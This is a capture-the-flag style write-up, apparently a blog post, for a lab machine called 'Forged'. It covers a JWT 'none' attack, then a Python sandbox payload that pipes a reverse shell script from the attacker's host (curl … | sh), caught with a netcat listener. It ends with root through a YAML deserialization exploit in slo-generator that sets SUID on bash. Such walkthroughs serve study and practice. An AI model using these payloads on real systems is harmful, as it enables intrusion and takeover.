Published on

Forged Writeup

Authors
logo

Port Scanning

nmap -sV -sC -p- -v $IP --open

forged

Enumeration

http://172.16.8.48

forged 1
forged 2

After registering, we can see the application has a New Project feature. However, we don’t have the privilege to access it.

forged 3
forged 4

Looking at the session cookies, we can see it uses a JWT.

forged 5

https://jwt.io/

forged 6

With this, we can test some JWT-related attacks.

JWT Hunter

Using the tool Jwt Hunter, we can see the JWT is vulnerable to a None Attack.

https://jwthunter.io/

forged 7

After copying the payload and pasting it into the session cookies, we gain access to the feature.

forged 8

Foot Hold

The New Project feature is a Python sandbox, and we gain initial access by sending the following payload:

evil.py

__import__('os').popen("curl 10.0.31.150/sh | sh").read()
forged 9

Note: I used the payload from https://reverse-shell.sh/yourip:1337

python3 -m http.server 80
forged 10
nc -lnvp 1337
forged 11

Privillege Escalation

sudo -l
forged 12

We can run the slo-generator binary as root without a password.

After some research, we found there’s a known exploit.

https://www.exploit-db.com/exploits/50385

forged 13

To exploit it, just run the following commands:

echo '!!python/object/apply:os.system ["chmod u+s /bin/bash"]' > exploit.yaml
sudo /usr/local/bin/slo-generator migrate -b exploit.yaml
bash -p
forged 14

Proof

forged 15
Discuss on TwitterView on GitHub